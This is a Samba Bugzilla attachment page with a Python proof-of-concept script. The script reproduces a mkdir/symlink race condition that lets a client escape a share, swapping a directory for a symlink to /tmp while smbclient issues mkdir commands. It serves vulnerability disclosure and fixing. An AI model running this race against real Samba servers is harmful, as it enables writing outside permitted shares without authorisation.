The Samba-Bugzilla – Attachment 15213 Details for
Bug 13979
CVE-2021-43566 [SECURITY] mkdir race condition allows share escape in Samba 4.x
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
Race reproduction script from June 2, 2019
race-2019-06-02.py (text/plain), 1.18 KB, created by
hansmi
on 2019-06-02 19:42:01 UTC
(
hide
)
Description:
Race reproduction script from June 2, 2019
Filename:
MIME Type:
Creator:
hansmi
Created:
2019-06-02 19:42:01 UTC
Size:
1.18 KB
patch
obsolete
>#!/usr/bin/python3 > >import os >import sys >import shutil >import time >import random >import threading >import subprocess > > >ev = threading.Event() > > >def worker(): > path = "/mnt/first" > dest = os.path.join(path, "dest") > fordel = os.path.join(path, "fordel") > > while True: > try: > if os.path.islink(dest): > os.unlink(dest) > elif os.path.isdir(dest): > shutil.rmtree(dest) > > if os.path.isdir(fordel): > shutil.rmtree(fordel) > > os.mkdir(dest) > ev.set() > os.rename(dest, fordel) > os.symlink("/tmp", dest) > ev.clear() > except Exception as err: > print(err) > > >def main(): > threading.Thread(target=worker, daemon=True).start() > > # Use smbclient to force use of separate smbd process as well as to require > # resolving of symlink on server > cmd = [ > "bin/smbclient", > "-U", "johndoe", > r"\\172.17.0.2\data", > "pass", > "-", > ] > > with subprocess.Popen(cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc: > while True: > ev.wait() > proc.stdin.write("mkdir dest/shouldnotexist.{}\n".format(time.time())) > proc.stdin.flush() > > >if __name__ == "__main__": > main() > ># vim: set sw=2 sts=2 et :
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 13979
:
15205
|
15212
| 15213 |
15214
|
15215
|
15217
|
16812
|
16815
|
16987
|
16988
|
17072